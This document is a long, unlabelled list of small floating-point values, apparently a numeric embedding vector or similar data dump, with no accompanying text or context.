0.005620721261948347, 0.007722000125795603, 0.02395298145711422, -0.024240609258413315, -0.004705905914306641, 0.0200060922652483, 0.007965684868395329, 0.007969679310917854, 0.01226411759853363, -0.009659490548074245, 0.0032717629801481962, 0.02312205731868744, -0.008500991389155388, -0.06126466393470764, -0.030792124569416046, -0.03550602123141289, 0.010762062855064869, 0.017673112452030182, -0.02008598856627941, 0.011273400858044624, -0.003813062096014619, 0.007725995033979416, -0.018216410651803017, 0.0013672293862327933, 0.025934414938092232, -0.012056387029588223, -0.024576174095273018, 0.022962264716625214, 0.0005188281065784395, -0.0008843547548167408, 0.029210172593593597, -0.03908538445830345, -0.015364103950560093, -0.002259074477478862, -0.04557298123836517, 0.004893662873655558, 0.0029721511527895927, 0.028043683618307114, -0.0051972693763673306, -0.013486535288393497, -0.03138335794210434, -0.002614614088088274, 0.010905876755714417, -0.0003250790177844465, -0.0122321592643857, -0.022978242486715317, -0.004893662873655558, -0.011545049026608467, -0.014453282579779625, 0.017177755013108253, 0.0035593905486166477, -0.029561717063188553, 0.02262669801712036, 0.02991326153278351, -0.015491938218474388, -0.004522143863141537, -0.03480292856693268, 0.005472912453114986, 0.018504036590456963, 0.009443770162761211, -0.01983032003045082, 0.021108664572238922, 0.013334731571376324, -0.021364333108067513, 0.018408160656690598, 0.005724586546421051, -0.026797298341989517, 0.015252248384058475, 0.009291966445744038, -0.015931369736790657, -0.016099151223897934, 0.014700962230563164, 0.03844621032476425, -0.026078227907419205, -0.016426727175712585, 0.018200431019067764, -0.01403782144188881, -0.009771346114575863, 0.00578051432967186, 0.013222876004874706, -0.004841729998588562, -0.006647391710430384, 0.008469033055007458, 0.0013951932778581977, 0.011233452707529068, -0.019031355157494545, -0.004693921189755201, -0.013206897303462029, -0.013590400107204914, -0.012951227836310863, -0.00702290516346693, -0.0003033571410924196, 0.012975197285413742, 0.03576168790459633, -0.01581152342259884, 0.024959677830338478, -0.0016988000134006143, 0.02483184263110161, -0.008980370126664639, 0.00633978983387351, 0.00988320168107748, 0.05407397449016571, 0.006327805574983358, -0.0003752640332095325, 0.01899939589202404, 0.005093404091894627, 0.006040177773684263, 0.0036972120869904757, -0.006475613918155432, 0.015451990067958832, -0.02758028358221054, 0.019718464463949203, -0.005560798570513725, 0.0000429755964432843, 0.007086822763085365, -0.015611782670021057, 0.022706594318151474, 0.007825865410268307, 0.007993647828698158, 0.026605546474456787, -0.0061600226908922195, -0.0001831378322094679, 0.0038310387171804905, 0.0001743991597322747, 0.005500876344740391, -0.005764534696936607, -0.0025347175542265177, 0.03934105485677719, 0.01887156069278717, -0.02019784413278103, 0.004358355887234211, -0.0022151314187794924, -0.03761528804898262, -0.0037930880207568407, -0.01741744391620159, -0.014820806682109833, 0.0023229916114360094, 0.0007495293393731117, -0.007446357049047947, -0.013502513989806175, 0.03461117669939995, 0.0017717056907713413, -0.021779794245958328, 0.03254984691739082, 0.00038624979788437486, -0.012120304629206657, 0.002492771949619055, 0.023521538823843002, -0.002466805512085557, 0.015731627121567726, -0.00668733986094594, 0.005221238359808922, -0.01970248483121395, -0.011872624978423119, -0.00988320168107748, -0.0038550077006220818, -0.008269291371107101, 0.00014880728849675506, 0.009012329392135143, -0.016442706808447838, 0.015483948402106762, -0.0038110646419227123, -0.005229228176176548, 0.004102686885744333, -0.015332144685089588, -0.0027784020639955997, 0.02465607039630413, 0.003619313007220626, -0.037199825048446655, -0.04624411463737488, 0.0030640321783721447, 0.013127000071108341, 0.0018635865999385715, 0.01337467972189188, -0.006375743541866541, -0.024576174095273018, 0.01022675633430481, 0.037455495446920395, 0.031926654279232025, 0.006990946829319, 0.014229572378098965, -0.0034535275772213936, 0.0007070843130350113, 0.003994826693087816, -0.00972340814769268, -0.02433648332953453, -0.027212759479880333, 0.008341197855770588, -0.0231859739869833, -0.015531886368989944, -0.0010945824906229973, -0.017641155049204826, 0.023777209222316742, 0.025327201932668686, 0.0009977079462260008, -0.02301020175218582, -0.029833365231752396, 0.002956171752884984, -0.02021382376551628, -0.003008104395121336, 0.006044172681868076, 0.0212844368070364, 0.005157321225851774, -0.012519787065684795, 0.007342491298913956, -0.021316396072506905, -0.007534243166446686, 0.00012084350601071492, 0.0025367150083184242, -0.019334960728883743, 0.017960740253329277, 0.014581117779016495, -0.0023569478653371334, -0.008221353404223919, -0.022083401679992676, -0.005412990227341652, -0.002710490021854639, -0.008724701590836048, -0.015643741935491562, 0.01677827164530754, -0.02579060196876526, 0.007126770913600922, 0.019414857029914856, -0.023281849920749664, -0.019478775560855865, 0.02579060196876526, 0.01741744391620159, -0.029689552262425423, 0.007006925996392965, 0.029849344864487648, -0.017177755013108253, 0.005065440200269222, -0.01962258853018284, 0.006191981490701437, -0.0015969319501891732, 0.0013702255673706532, 0.008884494192898273, 0.025806579738855362, -0.01512441411614418, 0.046851325780153275, 0.017753010615706444, 0.00997907668352127, -0.0034974708687514067, -0.015995286405086517, -0.017305588349699974, 0.0036832301411777735, 0.011241442523896694, 0.013270813971757889, 0.004626009147614241, 0.013838079757988453, 0.009771346114575863, 0.014157665893435478, -0.0004631502088159323, -0.012847363017499447, 0.024192670360207558, 0.007290558889508247, 0.021428249776363373, 0.0044222730211913586, 0.013933955691754818, -0.020725160837173462, -0.019862277433276176, -0.012847363017499447, -0.012272107414901257, 0.0005942304851487279, -0.013997872360050678, 0.013718235306441784, 0.0012653613230213523, 0.01652260310947895, -0.02489575929939747, -0.015044517815113068, 0.012359993532299995, -0.01626693457365036, -0.0003877478593494743, -0.01690610684454441, 0.011776749044656754, -0.006703319028019905, 0.00010904628288699314, 0.015987295657396317, 0.016354819759726524, 0.005389021243900061, 0.020757120102643967, -0.01083397027105093, 0.002231110818684101, 0.012847363017499447, -0.015004568733274937, 0.01086592860519886, -0.0017127819592133164, 0.002040357794612646, -0.0021272453013807535, -0.0028363270685076714, -0.015563844703137875, -0.015499928034842014, -0.006663370877504349, -0.009148153476417065, -0.00395288085564971, 0.002752435626462102, 0.024783905595541, -0.015420030802488327, 0.01013887021690607, 0.007142750080674887, 0.018775684759020805, -0.010178818367421627, -0.0029282078612595797, -0.01128139067441225, -0.007626124192029238, -0.007957695052027702, 0.014333438128232956, -0.013678286224603653, 0.02852306328713894, 0.00498554389923811, 0.003293734509497881, 0.023553498089313507, 0.0013941945508122444, -0.006962982937693596, 0.01147314254194498, -0.009443770162761211, 0.0266854427754879, -0.014005862176418304, 0.004921626299619675, -0.005996234714984894, 0.016442706808447838, -0.013382669538259506, -0.01311901118606329, -0.03005707636475563, -0.01574760675430298, 0.011297370307147503, -0.004434257745742798, 0.01156102865934372, -0.006120074540376663, -0.004945595283061266, -0.0071107917465269566, 0.02324989065527916, 0.013023135252296925, 0.010019025765359402, 0.004657967947423458, 0.015220290049910545, 0.01432544831186533, 0.0038310387171804905, -0.003817057004198432, 0.011696852743625641, 0.011161546222865582, 0.008469033055007458, 0.002305014990270138, 0.004262479953467846, 0.01989423669874668, -0.004086707718670368, -0.0010626239236444235, -0.007901767268776894, 0.007506279274821281, 0.0008723702630959451, 0.0048736887983977795, -0.01575559563934803, -0.009619542397558689, -0.01689012721180916, 0.024112774059176445, -0.020916912704706192, 0.011489121243357658, 0.0029641613364219666, 0.0038390285335481167, 0.00797766912728548, 0.00676723662763834, -0.0011934544891119003, -0.004741859156638384, 0.01645868644118309, -0.008924443274736404, 0.009132173843681812, 0.012807413935661316, 0.008532949723303318, -0.0027404511347413063, -0.02598235197365284, 0.015515906736254692, -0.006048167590051889, -0.0039169276133179665, 0.013063083402812481, 0.0011555036762729287, -0.01363034825772047, 0.013134989887475967, -0.006215950474143028, -0.00069310242542997, -0.02280247025191784, -0.011824687011539936, -0.0021292425226420164, 0.016698375344276428, -0.0006911050295457244, -0.005397011060267687, -0.031047793105244637, 0.006112084724009037, 0.0005457932129502296, 0.010945824906229973, 0.018759706988930702, 0.01166489440947771, -0.026893172413110733, 0.005373042076826096, -0.0036472766660153866, -0.006831153761595488, -0.007841845043003559, -0.008820577524602413, 0.0031219569500535727, -0.0077899121679365635, -0.018504036590456963, -0.008105503395199776, 0.018695788457989693, -0.002950179623439908, -0.01855197548866272, -0.005420980043709278, 0.013702255673706532, 0.012176231481134892, 0.0055847675539553165, 0.017049919813871384, 0.010322632268071175, 0.016666416078805923, -0.0007385435746982694, -0.003199856262654066, 0.01083397027105093, -0.006152033340185881, -0.010162838734686375, -0.011185514740645885, -0.004869693890213966, 0.0026925131678581238, 0.010714124888181686, -0.0028862622566521168, 0.008836556226015091, -0.002026375848799944, -0.011065670289099216, 0.02217927761375904, -0.010298662818968296, 0.014157665893435478, 0.0007560209487564862, -0.013981893658638, -0.013214887119829655, -0.0009647506522014737, -0.020932892337441444, 0.016043223440647125, -0.00927598774433136, -0.026222042739391327, -0.006471619475632906, -0.012359993532299995, 0.013454576022922993, -0.015364103950560093, -0.0014900703681632876, 0.0025007615331560373, -0.00281235808506608, -0.006723293103277683, -0.008057565428316593, -0.011856645345687866, 0.01538008265197277, -0.008105503395199776, 0.006567494943737984, -0.018472079187631607, -0.009228049777448177, -0.009707428514957428, -0.000027089918148703873, 0.038286417722702026, 0.007046874146908522, -0.024320505559444427, -0.02301020175218582, 0.0074024139903485775, -0.014373386278748512, 0.006379738450050354, 0.0016698375111445785, -0.007662077434360981, -0.0005877388757653534, 0.024560194462537766, 0.008405115455389023, -0.0005562796141020954, -0.02497565560042858, 0.012160252779722214, 0.00790975708514452, -0.001034660148434341, 0.003577367402613163, 0.004374335054308176, -0.005313119385391474, 0.00004862452988163568, -0.015292196534574032, 0.008644805289804935, 0.0026385830715298653, -0.0018206422682851553, 0.01695404388010502, 0.0025007615331560373, 0.012096335180103779, -0.010474435985088348, 0.02192360907793045, -0.014629055745899677, 0.003962867893278599, 0.0011994467349722981, 0.004709900822490454, -0.005724586546421051, -0.013582411222159863, 0.019239084795117378, 0.00013220380060374737, 0.00001608854108781088, 0.011097628623247147, -0.010594280436635017, -0.0024328494910150766, 0.01563575118780136, 0.0006856121472083032, 0.013949934393167496, 0.01432544831186533, -0.005145336966961622, 0.0033716338220983744, 0.006811179686337709, -0.012024428695440292, -0.019414857029914856, -0.013087051920592785, -0.001100574736483395, 0.03451530262827873, 0.016123119741678238, -0.0004998527001589537, -0.005536829587072134, 0.003034070832654834, 0.0019035348668694496, 0.01226411759853363, -0.014509210363030434, 0.015420030802488327, 0.0260622501373291, 0.027084924280643463, 0.0017527302261441946, 0.02320195361971855, -0.001465102657675743, -0.0155718345195055, 0.008317229337990284, -0.0073065380565822124, 0.0040307799354195595, -0.005452938377857208, -0.013782151974737644, 0.010458456352353096, -0.0014501221012324095, 0.0005782511434517801, -0.012272107414901257, -0.021620001643896103, -0.009443770162761211, 0.004278459586203098, -0.010218766517937183, -0.003751142183318734, 0.014972610399127007, -0.002776404609903693, 0.012032417580485344, -0.0020912918262183666, 0.019654547795653343, 0.010905876755714417, -0.014908692799508572, -0.05065440386533737, -0.013422617688775063, 0.012583703733980656, 0.004072725772857666, 0.004961574915796518, 0.00863681547343731, -0.0026166115421801805, -0.006168012507259846, 0.011920562945306301, 0.007170713972300291, 0.002161201322451234, -0.00315391574986279, 0.00021909127826802433, -0.006579479668289423, -0.012551745399832726, 0.022834429517388344, -0.013270813971757889, -0.0011345307575538754, -0.00277240970171988, 0.010786032304167747, 0.00034130801213905215, 0.001363234594464302, -0.019750423729419708, 0.0025906451046466827, -0.007566201966255903, -0.009451759979128838, 0.026030290871858597, -0.00812947191298008, -0.026445752009749413, 0.00578051432967186, -0.007538238074630499, -0.02388906292617321, 0.004048756789416075, -0.023265870288014412, 0.0037831009831279516, 0.02762822061777115, 0.014748900197446346, 0.029561717063188553, -0.01248782780021429, -0.000021378564269980416, -0.00933990441262722, -0.0032897398341447115, -0.03959672152996063, -0.012607673183083534, -0.0030640321783721447, 0.03902146592736244, 0.012415921315550804, -0.009635522030293941, -0.009108205325901508, -0.0059602814726531506, -0.0038869662676006556, 0.0014381376095116138, 0.0020872969180345535, -0.019542692229151726, 0.004458226729184389, 0.005724586546421051, -0.007418393157422543, -0.002776404609903693, 0.009747377596795559, -0.019031355157494545, 0.0032577812671661377, -0.007837849669158459, -0.018088575452566147, 0.007050869055092335, -0.014357407577335835, -0.0011445177951827645, -0.0018336254870519042, 0.02860295958817005, 0.018919499590992928, 0.00813346728682518, 0.008161431178450584, 0.000041446328395977616, -0.00870073214173317, 0.02267463691532612, -0.0317828394472599, -0.0019534702878445387, 0.00984325259923935, 0.03397200629115105, -0.01162494532763958, 0.011385256424546242, -0.0060521624982357025, 0.012527776882052422, -0.02356947772204876, 0.003439545864239335, 0.005500876344740391, 0.0254070982336998, 0.009363873861730099, -0.009651501663029194, 0.010362580418586731, 0.009659490548074245, -0.007821870967745781, -0.009659490548074245, -0.003944891504943371, 0.02909831702709198, -0.019047332927584648, 0.004362350795418024, -0.00866877380758524, -0.008109497837722301, 0.0006236922927200794, -0.009076246060431004, 0.003817057004198432, 0.0052611869759857655, -0.003898950759321451, -0.011616956442594528, -0.0039289118722081184, 0.012272107414901257, -0.020884953439235687, -0.011832676827907562, -0.0020733149722218513, 0.01632286235690117, 0.02852306328713894, -0.011880614794790745, 0.01067417673766613, 0.022147318348288536, 0.002794381231069565, -0.02192360907793045, 0.010490414686501026, -0.01867980882525444, 0.0013732216320931911, 0.007030894979834557, 0.005149331409484148, -0.007749964017421007, 0.01893547922372818, 0.028507083654403687, 0.0025247305165976286, 0.006815174128860235, 0.005904353689402342, 0.01943083666265011, -0.007546227425336838, -0.0009832266950979829, -0.003227819921448827, 0.013190917670726776, -0.03125552460551262, -0.013047103770077229, -0.005824457388371229, -0.00763810845091939, 0.005093404091894627, -0.0006796199013479054, 0.0076820519752800465, -0.002712487243115902, -0.021651960909366608, -0.015172352083027363, -0.021811753511428833, 0.009060267359018326, 0.027963787317276, -0.014972610399127007, -0.006443655584007502, 0.01512441411614418, 0.006982957012951374, -0.002618608996272087, -0.008213363587856293, 0.0023369735572487116, -0.0002496766683179885, 0.0006561502814292908, -0.015739617869257927, -0.008692743256688118, 0.003389610443264246, 0.00041895743925124407, 0.0016598504735156894, 0.016746314242482185, -0.01038654986768961, 0.0016428724629804492, -0.016378790140151978, -0.0085808876901865, -0.008405115455389023, 0.011185514740645885, 0.02085299603641033, -0.0026385830715298653, -0.02014990523457527, -0.011920562945306301, 0.0019095271127298474, 0.0036532690282911062, -0.005333093460649252, -0.019015375524759293, -0.01311901118606329, -0.010889897122979164, -0.005500876344740391, -0.001852600835263729, 0.011792728677392006, 0.011672883294522762, -0.029274089261889458, -0.009771346114575863, -0.008189395070075989, -0.032565828412771225, -0.0005148333148099482, 0.01708187907934189, -0.012447879649698734, -0.007538238074630499, -0.004134645685553551, -0.012288087047636509, -0.005796493496745825, -0.001113557955250144, 0.015499928034842014, 0.002085299463942647, -0.004510159138590097, -0.014812817797064781, 0.02166794054210186, -0.008748670108616352, 0.02865089662373066, 0.034227676689624786, 0.0023209943901747465, 0.0038450206629931927, -0.00972340814769268, -0.003439545864239335, 0.0059722657315433025, 0.00024243604275397956, -0.01804063655436039, -0.005137347150593996, 0.014868744648993015, 0.01575559563934803, -0.001120548928156495, 0.004833740182220936, -0.01780094765126705, -0.00319186644628644, 0.014980600215494633, 0.011409224942326546, 0.006763241719454527, 0.0032238252460956573, -0.010802011005580425, 0.02542307786643505, -0.007358470931649208, -0.013047103770077229, -0.017689092084765434, -0.021140621975064278, 0.006235924549400806, 0.01676229201257229, -0.003449532901868224, 0.0005472912453114986, 0.014061789959669113, -0.000944277155213058, 0.0007510274299420416, 0.011081648990511894, -0.01401385199278593, 0.006775225978344679, -0.006907055154442787, 0.01606719382107258, 0.001763715990819037, 0.00619597639888525, 0.02312205731868744, -0.028315331786870956, 0.022722573950886726, 0.004881678149104118, -0.008073545061051846, -0.015587814152240753, -0.0038550077006220818, 0.0022950279526412487, -0.00319186644628644, 0.009012329392135143, -0.02642977423965931, -0.013174938037991524, -0.02293030545115471, 0.004833740182220936, 0.00997907668352127, 0.02083701640367508, -0.0174813624471426, 0.037966832518577576, -0.016163069754838943, -0.006815174128860235, -0.001789682311937213, -0.024352462962269783, -0.013414627872407436, -0.020565368235111237, -0.01594734750688076, 0.021124644204974174, -0.0060361833311617374, -0.018312284722924232, -0.020245781168341637, 0.019462795928120613, 0.006667365785688162, -0.00441428367048502, -0.010937835089862347, -0.004386319778859615, -0.028539041057229042, -0.001592937158420682, 0.0016748311463743448, -0.006279867608100176, -0.013662307523190975, 0.023042161017656326, -0.01754527911543846, -0.005365052260458469, 0.038222502917051315, -0.0085808876901865, -0.0042984336614608765, 0.01019479800015688, 0.009028308093547821, -0.010738094337284565, 0.0019235090585425496, -0.03349262848496437, -0.01645868644118309, 0.017001982778310776, -0.009715418331325054, -0.020613305270671844, -0.0028103606309741735, 0.0037191836163401604, -0.00804158579558134, -0.002696508076041937, -0.001100574736483395, 0.004358355887234211, 0.0010326626943424344, 0.03454726189374924, -0.006958988029509783, 0.019175168126821518, 0.0008029601885937154, 0.0021931598894298077, -0.02903440035879612, -0.0055568041279911995, -0.03261376544833183, -0.013798131607472897, 0.003966862801462412, 0.010250724852085114, -0.015044517815113068, -0.006986951921135187, 0.026349876075983047, 0.014141686260700226, -0.018567955121397972, -0.005680643487721682, 0.01264762133359909, -0.018695788457989693, -0.00028463141643442214, 0.023553498089313507, -0.004570081830024719, -0.01727363094687462, 0.00854892935603857, -0.000650158035568893, -0.00816542562097311, -0.007086822763085365, -0.008916453458368778, -0.00023407187836710364, -0.031031813472509384, -0.02014990523457527, -0.02502359449863434, -0.010810000821948051, -0.03163902834057808, 0.0018905517645180225, -0.012144273146986961, 0.015795545652508736, 0.00042395098716951907, -0.000009456503903493285, 0.020884953439235687, -0.001973444363102317, 0.0015809526666998863, -0.004000818822532892, 0.0037890931125730276, 0.012184221297502518, 0.007462336216121912, -0.00007446606468874961, -0.005740566179156303, -0.025646787136793137, 0.020549388602375984, -0.004989538341760635, -0.01251179724931717, -0.006415691692382097, -0.0027803992852568626, 0.0007185694412328303, 0.011856645345687866, -0.0028862622566521168, 0.02249886468052864, -0.020725160837173462, -0.027036987245082855, -0.00047338695731014013, -0.011001752689480782, -0.0011145566822960973, -0.005908348597586155, 0.0036912199575453997, 0.00383703107945621, -0.005025492049753666, -0.00562471617013216, -0.013894007541239262, 0.011696852743625641, 0.023154014721512794, -0.0040247878059744835, -0.015084465965628624, 0.014437303878366947, -0.017880843952298164, 0.01318292785435915, 0.009331915527582169, -0.0005373042076826096, -0.005996234714984894, 0.009379853494465351, 0.008397125639021397, -0.004578071180731058, 0.002742448588833213, -0.016378790140151978, 0.015308176167309284, 0.007474320940673351, -0.012599683366715908, 0.0071227760054171085, 0.019798360764980316, 0.0012044402537867427, 0.03061635233461857, -0.007098807021975517, 0.011433194391429424, -0.015084465965628624, 0.012695559300482273, 0.02642977423965931, -0.0014920678222551942, 0.014828796498477459, -0.008049575611948967, -0.006008219439536333, -0.011185514740645885, -0.003665253520011902, -0.002434846945106983, 0.007570196408778429, 0.007610145024955273, -0.002614614088088274, -0.008884494192898273, 0.007162724155932665, 0.011385256424546242, 0.01741744391620159, -0.010921856388449669, 0.007925735786557198, 0.0002022381086135283, 0.0048057762905955315, 0.01639476791024208, -0.009683459997177124, 0.009196091443300247, 0.00733849685639143, -0.0007455345476046205, -0.0005687634693458676, 0.023713290691375732, -0.01448524184525013, -0.012080355547368526, 0.0028622932732105255, -0.006299841683357954, -0.005213249009102583, -0.0017577237449586391, -0.035346224904060364, 0.023393705487251282, -0.008852535858750343, 0.0009437777916900814, -0.01181669719517231, -0.01606719382107258, 0.0019394883420318365, 0.012751487083733082, -0.03767920657992363, 0.011257421225309372, -0.004733869805932045, 0.005428969394415617, 0.010122890584170818, 0.001812652568332851, -0.02745244838297367, -0.014621065929532051, -0.0034635148476809263, -0.018392182886600494, 0.007913751527667046, -0.000786481483373791, 0.008980370126664639, 0.00953165628015995, -0.004014800768345594, -0.02470400743186474, -0.00933990441262722, 0.004250495694577694, -0.025838539004325867, 0.011960511095821857, 0.018440119922161102, -0.026461731642484665, 0.005205259192734957, 0.006295846775174141, -0.016123119741678238, 0.00014993084187153727, -0.015148382633924484, -0.014445293694734573, -0.011065670289099216, 0.0174813624471426, -0.006811179686337709, -0.0023010200820863247, 0.01658651977777481, -0.0014790846034884453, -0.0024128754157572985, -0.031159648671746254, -0.01925506442785263, 0.0013053095899522305, 0.026445752009749413, -0.0155718345195055, -0.000017134061636170372, 0.005021497141569853, 0.006104095373302698, -0.01375818345695734, 0.0001953719911398366, -0.00186258798930794, 0.02617410384118557, 0.006403706967830658, -0.00046889277291484177, -0.013510503806173801, 0.0007670067134313285, -0.0006097104051150382, -0.012567725032567978, -0.002814355306327343, -0.02433648332953453, 0.0035454086028039455, -0.013718235306441784, 0.0038490155711770058, -0.024368442595005035, 0.013558441773056984, 0.0009457752457819879, -0.009547635912895203, -0.001740745734423399, 0.002554691629484296, 0.012799425050616264, 0.0006746263825334609, -0.007566201966255903, -0.001471094903536141, 0.011017732322216034, 0.01553987618535757, -0.01359838992357254, -0.0004009807307738811, -0.002269061515107751, -0.004250495694577694, -0.00997907668352127, -0.014253541827201843, 0.004633998963981867, 0.0015030535869300365, 0.01812053471803665, 0.017305588349699974, -0.006571489851921797, 0.004550107754766941, 0.0016658427193760872, -0.022514842450618744, 0.0017467379802837968, -0.0012683575041592121, 0.0044062938541173935, 0.002299022860825062, 0.0028243425767868757, -0.013957924209535122, 0.0037371604703366756, -0.017944760620594025, -0.012559735216200352, 0.004961574915796518, -0.022131340578198433, 0.0010181814432144165, -0.00975536648184061, -0.013670297339558601, 0.0070149158127605915, -0.0033556544221937656, 0.020341657102108, 0.012080355547368526, -0.0008234336273744702, 0.016362810507416725, 0.011992469429969788, 0.014277510344982147, -0.017369506880640984, 0.013318751938641071, 0.023841125890612602, 0.016506623476743698, 0.010562322102487087, 0.0017537289531901479, -0.00803359691053629, -0.00015092953981366009, -0.009220059961080551, -0.002788389101624489, 0.006559505593031645, 0.004130650777369738, -0.005776519421488047, -0.0037291706539690495, 0.012288087047636509, -0.0010656199883669615, 0.017449403181672096, 0.0016888129757717252, -0.03127150237560272, -0.015459978953003883, 0.0034735018853098154, -0.002472797641530633, 0.006207960657775402, -0.02363339439034462, 0.002854303689673543, -0.012359993532299995, 0.002003405475988984, -0.008708721958100796, -0.010306652635335922, -0.017433423548936844, 0.0014990586787462234, -0.017449403181672096, -0.009236039593815804, 0.0003073519910685718, -0.003906940575689077, 0.0018276332411915064, 0.011736800894141197, 0.01010691188275814, -0.02617410384118557, -0.00633978983387351, 0.0029381951317191124, 0.0031838768627494574, 0.008556919172406197, 0.003103980328887701, 0.0031339414417743683, 0.0004394309362396598, 0.023026181384921074, 0.008588877506554127, -0.017113838344812393, 0.009667480364441872, -0.010146860033273697, -0.007841845043003559, -0.009667480364441872, -0.002656559692695737, 0.005644690245389938, 0.0026226036716252565, 0.02299422211945057, -0.0022111365105956793, 0.017864864319562912, -0.016554562374949455, 0.023745249956846237, -0.003016094211488962, -0.0058484263718128204, 0.006223939824849367, -0.018472079187631607, -0.007046874146908522, -0.004442247096449137, 0.005844431463629007, -0.02077309973537922, 0.01994217559695244, 0.013230865821242332, -0.003593346569687128, 0.019271044060587883, 0.00863681547343731, 0.010698146186769009, 0.017577238380908966, 0.012383962981402874, -0.0021731858141720295, 0.0018685802351683378, 0.003669248428195715, -0.0020253772381693125, -0.018056616187095642, 0.00684313802048564, 0.02013392746448517, -0.009076246060431004, 0.0068271588534116745, -0.006511567626148462, 0.016282914206385612, -0.012639631517231464, -0.001136528211645782, 0.02828337252140045, -0.029066359624266624, -0.011073659174144268, -0.0260622501373291, -0.011001752689480782, 0.011321338824927807, 0.010778042487800121, 0.03063233196735382, -0.006647391710430384, -0.0031059777829796076, 0.025151429697871208, -0.019926195964217186, 0.004478200804442167, 0.0015559849562123418, -0.011289380490779877, -0.002315002027899027, -0.00102467299439013, -0.014373386278748512, -0.0015909397043287754, -0.015164362266659737, -0.002036362886428833, -0.006104095373302698, 0.03010501340031624, 0.0006771231419406831, 0.026509670540690422, -0.007913751527667046, -0.021572064608335495, 0.003906940575689077, -0.017193734645843506, -0.0006201968644745648, 0.008868515491485596, 0.021332373842597008, 0.0125437555834651, 0.01390998624265194, -0.002466805512085557, -0.0009472732781432569, 0.029401924461126328, 0.012144273146986961, -0.002960166661068797, -0.008253311738371849, -0.023473601788282394, 0.018839603289961815, 0.01022675633430481, -0.0036013361532241106, 0.02745244838297367, 0.0072306361980736256, -0.0006721295649185777, 0.005696622654795647, -0.017177755013108253, -0.004226526711136103, 0.018024658784270287, -0.03159109130501747, 0.00417858874425292, -0.006327805574983358, -0.025630807504057884, 0.01740146428346634, -0.003994826693087816, -0.0065315417014062405, -0.005500876344740391, 0.004929616115987301, -0.0023229916114360094, 0.004390314687043428, 0.003477496560662985, -0.005724586546421051, 0.022099381312727928, -0.00748231029137969, -0.02991326153278351, 0.0016199022065848112, 0.011465152725577354, 0.002706495113670826, 0.014557148329913616, -0.008732691407203674, 0.01754527911543846, 0.014213593676686287, 0.03168696537613869, -0.004729874897748232, -0.016043223440647125, -0.024799883365631104, 0.005405000410974026, 0.0025926425587385893, 0.012999165803194046, 0.01855197548866272, 0.0021332374308258295, 0.0024228624533861876, 0.003944891504943371, 0.0018346242140978575, 0.006875096820294857, 0.004530133679509163, -0.020996809005737305, 0.001116554019972682, 0.0043144128285348415, -0.017449403181672096, 0.008916453458368778, -0.016410747542977333, -0.011744790710508823, -0.003992829471826553, 0.003297729417681694, 0.02046949230134487, 0.005824457388371229, 0.0015689681749790907, 0.012312055565416813, -0.019031355157494545, -0.005420980043709278, 0.009212070144712925, -0.009619542397558689, -0.00037751111085526645, 0.011928552761673927, -0.01658651977777481, 0.004060741513967514, -0.004202557727694511, -0.0024787900038063526, -0.0025427071377635, 0.002966158790513873, 0.027596263214945793, 0.00437034061178565, -0.001330277300439775, -0.02459215372800827, 0.021012788638472557, 0.010170828551054, -0.016554562374949455, 0.003465512068942189, 0.02483184263110161, -0.008485011756420135, -0.023857105523347855, 0.0017187742050737143, 0.002906236331909895, 0.00997907668352127, -0.01633884198963642, 0.015252248384058475, -0.004202557727694511, -0.0037850982043892145, 0.025055553764104843, 0.020421553403139114, 0.018200431019067764, 0.0032258224673569202, -0.0015090458327904344, -0.00896439142525196, -0.0018036642577499151, 0.014716941863298416, 0.013294783420860767, -0.005253197159618139, -0.01714579574763775, -0.010786032304167747, 0.010154849849641323, -0.0019275038503110409, 0.008836556226015091, 0.01784888654947281, 0.008461043238639832, -0.014621065929532051, -0.0007700028363615274, -0.008876505307853222, -0.008996349759399891, 0.0050774249248206615, 0.01337467972189188, -0.009667480364441872, 0.008940421976149082, 0.012943238951265812, 0.006363758817315102, -0.006096105556935072, 0.020533408969640732, -0.0026785312220454216, 0.005480902269482613, 0.003175887279212475, 0.0071227760054171085, -0.007793907076120377, 0.013662307523190975, 0.0027444460429251194, -0.017625175416469574, 0.019047332927584648, -0.011952521279454231, -0.016163069754838943, -0.0005622718599624932, -0.01140123512595892, -0.02070918120443821, 0.007314527872949839, -0.020501449704170227, 0.027340594679117203, 0.008061559870839119, 0.014669003896415234, -0.010961804538965225, -0.020117947831749916, -0.006671360693871975, 0.009571604430675507, 0.004234516527503729, -0.026957090944051743, 0.026957090944051743, -0.022706594318151474, 0.004238510970026255, -0.0028103606309741735, -0.026973070576786995, -0.004857709165662527, -0.0007095810724422336, 0.00017427431885153055, -0.004574076738208532, -0.02026176080107689, 0.0035613880027085543, 0.010346600785851479, 0.010586290620267391, -0.008932432159781456, 0.015675699338316917, 0.006607443559914827, -0.023521538823843002, 0.005900359246879816, -0.001987426308915019, 0.018711768090724945, -0.0018545982893556356, -0.010546342469751835, -0.0006062149768695235, 0.020725160837173462, -0.00452613877132535, -0.007610145024955273, 0.009012329392135143, -0.014157665893435478, 0.019910216331481934, 0.00633978983387351, -0.01546796876937151, -0.002171188360080123, 0.006559505593031645, 0.0006451645167544484, -0.00113952427636832, 0.005201264284551144, 0.005716597195714712, -0.003745150053873658, 0.0013132992899045348, -0.005305130034685135, -0.0049975281581282616, -0.004677942022681236, 0.018392182886600494, -0.00949969794601202, 0.0010022021597251296, -0.004602040164172649, -0.009068256244063377, -0.01658651977777481, 0.003930909559130669, -0.00984325259923935, 0.0308081042021513, 0.00008894731581676751, 0.005373042076826096, -0.004829745274037123, -0.004817761015146971, -0.004000818822532892, 0.000027745320039684884, -0.03512251749634743, -0.02777203544974327, 0.0064236815087497234, -0.019159188494086266, -0.008381146006286144, 0.003287742380052805, 0.0010855941800400615, -0.02040557563304901, -0.02414473332464695, 0.000740540970582515, -0.006527546793222427, 0.006571489851921797, 0.014972610399127007, 0.015036527998745441, 0.029210172593593597, 0.036624569445848465, 0.012367983348667622, 0.015028538182377815, -0.01156102865934372, -0.016474666073918343, -0.007877797819674015, 0.0016238969983533025, -0.0012793432688340545, -0.00125437555834651, 0.008421095088124275, 0.019143208861351013, 0.003717186162248254, 0.0035953440237790346, -0.0076980311423540115, 0.002217128872871399, -0.010186808183789253, -0.0008763651130720973, -0.0025247305165976286, 0.008532949723303318, 0.0023449633736163378, 0.0037551370915025473, -0.013973903842270374, 0.007833855226635933, -0.02115660160779953, -0.009627532213926315, 0.006164017599076033, 0.02241896651685238, 0.0048057762905955315, 0.032374076545238495, 0.006903060711920261, 0.00946773961186409, 0.008604857139289379, 0.010770052671432495, -0.010778042487800121, -0.017049919813871384, 0.0020253772381693125, 0.01166489440947771, 0.012815403752028942, 0.0200060922652483, -0.010354590602219105, -0.00997108779847622, 0.018248368054628372, 0.005337088368833065, 